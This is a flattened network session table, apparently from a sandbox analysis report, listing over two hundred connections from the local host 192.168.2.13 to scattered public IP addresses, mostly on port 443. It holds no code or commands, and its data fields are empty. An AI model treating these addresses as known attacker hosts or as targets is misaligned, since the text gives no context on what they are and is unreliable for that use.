                                    19442192.168.2.134432698.77.39.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19443192.168.2.1354998216.106.0.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19444192.168.2.135329492.59.248.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19445192.168.2.1335536196.153.1.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19446192.168.2.1345662159.58.63.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19447192.168.2.1351082201.203.106.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19448192.168.2.1350794169.219.209.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19449192.168.2.133278680.172.198.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19450192.168.2.133308242.118.142.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19451192.168.2.135037412.125.53.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19452192.168.2.1340884109.189.99.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19453192.168.2.1334604151.233.96.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19454192.168.2.1354098221.88.130.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19455192.168.2.1345670173.101.207.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19456192.168.2.1354002179.127.136.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19457192.168.2.134984284.135.21.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19458192.168.2.135796446.11.118.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19459192.168.2.1337634148.67.105.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19460192.168.2.1333656199.253.218.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19461192.168.2.135030054.179.178.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19462192.168.2.1350676177.44.150.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19463192.168.2.1348184171.62.49.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19464192.168.2.1335718143.63.44.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19465192.168.2.135628262.113.217.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19466192.168.2.1337814142.185.227.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19467192.168.2.1339254116.226.10.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19468192.168.2.133430073.20.92.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19469192.168.2.1357416136.49.110.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19470192.168.2.1358052179.149.26.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19471192.168.2.1359568120.159.203.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19472192.168.2.135790048.164.0.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19473192.168.2.1358756223.149.47.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19474192.168.2.135896888.102.228.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19475192.168.2.1337454198.193.240.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19476192.168.2.1340842118.167.14.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19477192.168.2.133630034.213.86.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19478192.168.2.1347478217.84.100.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19479192.168.2.1355290175.201.30.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19480192.168.2.135338649.218.177.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19481192.168.2.134033873.184.225.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19482192.168.2.133920220.44.143.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19483192.168.2.1343204167.254.42.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19484192.168.2.133723045.11.139.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19485192.168.2.1353872197.166.90.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19486192.168.2.1343552121.198.14.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19487192.168.2.135962214.177.205.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19488192.168.2.1352606176.204.80.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19489192.168.2.1359416165.12.252.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19490192.168.2.1348574134.173.131.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19491192.168.2.1350604194.46.64.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19492192.168.2.1353040216.219.158.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19493192.168.2.1351612180.162.92.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19494192.168.2.133640671.210.90.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19495192.168.2.1346940121.166.15.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19496192.168.2.1345426200.254.177.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19497192.168.2.1352096145.120.131.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19498192.168.2.134024682.208.66.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19499192.168.2.1341222120.198.155.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19500192.168.2.1343946155.146.172.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19501192.168.2.135081082.5.61.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19502192.168.2.135899253.106.204.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19503192.168.2.134914669.173.229.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19504192.168.2.136086831.63.189.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19505192.168.2.135260218.145.158.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19506192.168.2.133833834.12.19.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19507192.168.2.134062637.133.36.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19508192.168.2.1345684170.83.223.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19509192.168.2.1342938207.215.200.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19510192.168.2.1346140106.119.13.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19511192.168.2.133915251.94.171.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19512192.168.2.134512657.129.16.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19513192.168.2.1347858153.215.124.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19514192.168.2.133396483.219.51.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19515192.168.2.1347156165.173.203.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19516192.168.2.1344438133.163.149.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19517192.168.2.1336158200.168.90.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19518192.168.2.1337210191.57.102.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19519192.168.2.1351292122.147.62.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19520192.168.2.1360932180.127.191.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19521192.168.2.1341786204.179.16.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19522192.168.2.135233283.37.141.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19523192.168.2.1350880110.130.17.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19524192.168.2.133450218.67.6.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19525192.168.2.1335744167.235.69.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19526192.168.2.1341782116.41.116.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19527192.168.2.1334604190.90.133.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19528192.168.2.134444862.180.75.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19529192.168.2.134195618.220.50.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19530192.168.2.1356118173.128.79.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19531192.168.2.133754659.132.93.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19532192.168.2.1336370177.41.66.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19533192.168.2.1337830174.99.247.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19534192.168.2.1339188103.207.212.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19535192.168.2.1360112129.227.66.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19536192.168.2.1359794155.244.72.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19537192.168.2.1349896150.19.134.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19538192.168.2.133652438.119.184.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19539192.168.2.133497839.46.155.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19540192.168.2.134066467.11.212.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19541192.168.2.135822036.229.255.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19542192.168.2.135278880.126.22.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19543192.168.2.1344782183.185.156.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19544192.168.2.1343834168.13.241.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19545192.168.2.1336250197.254.127.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19546192.168.2.135115886.149.3.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19547192.168.2.135210277.173.55.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19548192.168.2.1342278112.246.20.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19549192.168.2.1352622132.122.98.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19550192.168.2.1357694203.134.252.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19551192.168.2.133820493.213.138.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19552192.168.2.133617499.131.106.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19553192.168.2.1343284210.106.222.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19554192.168.2.13415265.211.214.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19555192.168.2.133439686.33.187.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19556192.168.2.133963087.104.11.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19557192.168.2.1346864174.253.204.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19558192.168.2.1342322157.117.29.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19559192.168.2.1346148134.177.221.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19560192.168.2.135183472.74.243.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19561192.168.2.1356044196.90.173.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19562192.168.2.1347370185.72.88.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19563192.168.2.134187878.95.26.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19564192.168.2.1352616150.136.204.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19565192.168.2.135782053.125.7.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19566192.168.2.1343944147.210.122.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19567192.168.2.134517446.108.173.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19568192.168.2.1334688172.249.124.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19569192.168.2.134362047.252.105.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19570192.168.2.135860859.73.111.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19571192.168.2.1356604223.230.185.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19572192.168.2.1353620122.144.151.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19573192.168.2.135624894.178.184.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19574192.168.2.134387617.23.14.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19575192.168.2.1353650172.7.3.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19576192.168.2.134854252.56.138.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19577192.168.2.1354228205.55.239.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19578192.168.2.1356026106.84.206.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19579192.168.2.1360710205.146.239.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19580192.168.2.135201675.45.124.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19581192.168.2.1333728186.32.243.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19582192.168.2.1335492111.159.83.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19583192.168.2.1358942118.193.24.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19584192.168.2.1348070126.217.197.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19585192.168.2.1357016110.192.28.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19586192.168.2.134414889.102.82.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19587192.168.2.134031049.176.10.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19588192.168.2.1349782142.243.91.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19589192.168.2.135451040.192.64.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19590192.168.2.1339494144.143.238.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19591192.168.2.1350094156.127.181.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19592192.168.2.1342666126.98.250.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19593192.168.2.134349090.179.1.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19594192.168.2.135498839.242.120.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19595192.168.2.135645245.104.59.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19596192.168.2.1348966180.149.13.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19597192.168.2.1352668200.5.126.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19598192.168.2.1343962177.10.192.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19599192.168.2.1353712107.178.184.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19600192.168.2.1340080113.73.158.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19601192.168.2.1358500222.104.21.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19602192.168.2.136052850.185.19.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19603192.168.2.1345932190.161.35.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19604192.168.2.1351426185.213.96.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19605192.168.2.1352296145.3.46.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19606192.168.2.1353754184.113.153.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19607192.168.2.133431843.156.0.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19608192.168.2.134865082.21.227.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19609192.168.2.1356158116.37.93.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19610192.168.2.1343146177.169.182.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19611192.168.2.1359554114.6.217.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19612192.168.2.1342032129.43.41.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19613192.168.2.1354006150.108.18.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19614192.168.2.1333200154.126.231.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19615192.168.2.1350770163.135.208.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19616192.168.2.1341104184.78.93.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19617192.168.2.1345888153.163.31.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19618192.168.2.1342564166.34.32.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19619192.168.2.1342412131.95.227.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19620192.168.2.135207013.195.243.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19621192.168.2.1336870115.35.15.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19622192.168.2.133696014.74.195.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19623192.168.2.1351956158.60.255.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19624192.168.2.1344240171.160.152.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19625192.168.2.1342704114.114.164.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19626192.168.2.133623014.223.179.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19627192.168.2.1351626115.62.217.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19628192.168.2.1341414219.146.21.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19629192.168.2.133425280.214.32.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19630192.168.2.1349916186.57.196.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19631192.168.2.1352176119.223.119.1938080
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19632192.168.2.1358366197.228.110.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19633192.168.2.134444863.180.8.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19634192.168.2.1347160180.77.77.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19635192.168.2.1340012207.245.255.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19636192.168.2.1351274211.216.250.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19637192.168.2.1360676138.219.37.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19638192.168.2.1345144125.23.217.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19639192.168.2.133498881.95.73.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19640192.168.2.1339286169.122.136.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19641192.168.2.1336214120.7.3.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19642192.168.2.133365049.28.255.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19643192.168.2.134869065.130.24.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19644192.168.2.133985079.154.111.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19645192.168.2.1358112133.98.127.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19646192.168.2.135430853.113.161.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19647192.168.2.1342682154.146.28.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19648192.168.2.1339134206.141.228.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19649192.168.2.1356574137.98.155.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19650192.168.2.1357174190.113.24.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19651192.168.2.135041644.174.230.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19652192.168.2.135472896.227.69.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19653192.168.2.135301079.197.127.128443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19654192.168.2.1335434192.244.221.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19655192.168.2.1334422132.192.35.75443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19656192.168.2.13534049.243.144.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19657192.168.2.1336734213.228.205.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19658192.168.2.1356410121.91.108.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19659192.168.2.1347392203.185.170.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19660192.168.2.1335372150.87.126.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19661192.168.2.1349812178.160.131.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19662192.168.2.135647665.2.210.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19663192.168.2.1339144103.251.5.230443
                                    TimestampBytes transferredDirectionData


